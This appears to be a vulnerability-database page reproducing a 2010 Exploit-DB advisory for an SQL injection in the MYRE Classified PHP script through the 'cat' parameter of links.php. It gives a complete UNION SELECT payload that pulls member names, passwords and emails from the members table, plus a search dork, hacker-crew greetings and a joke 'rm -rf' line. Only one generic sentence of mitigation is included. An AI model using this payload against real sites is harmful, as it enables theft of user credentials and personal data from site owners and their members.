MYRE Classified SQL injection vulnerability - (cat)

vendor:

N/A

by:

kaMtiEz

7,5

CVSS

HIGH

SQL injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

MYRE Classified SQL injection vulnerability – (cat)

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable application. The malicious query can be sent as a parameter in the URL. The vulnerable parameter is ‘cat’. The malicious query is ‘-666/**/union/**/all/**/select/**/666,666,666,concat_ws(0x3a,member_name,member_password,email)kaMtiEz,@@version,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666/**/from/**/members--’. This query will return the member name, password and email of the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

###################################################################################
                                                                                  #
[~] MYRE Classified SQL injection vulnerability - (cat)                           # 
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)                                    #
[~] Homepage	: http://www.indonesiancoder.com                                  #
[~] Date	: January 29, 2010                                                #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://myrephp.com/
[+] Vulnerability : SQL injection
[+] Dork : "syalalala"
[+] Price : $499           
[+] Location : INDONESIA - JOGJA

##################################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/links.php?cat=[INDONESIANCODER]

[ Exploit ]

-666/**/union/**/all/**/select/**/666,666,666,concat_ws(0x3a,member_name,member_password,email)kaMtiEz,@@version,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666/**/from/**/members--

===========================================================================


[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13Z
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk,r3m1ck

[ NOTE ] 

[+] Don Tukulesto : yuk iseng lagiiiiiiiiiiiiii ..
[+] Ibl13Z : kapan2 dolan bareng neh yo ?? hahaha
[+] r3m1ck : kost kok koyo warnet .. hahahaaa 
[+] rm -rf 

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..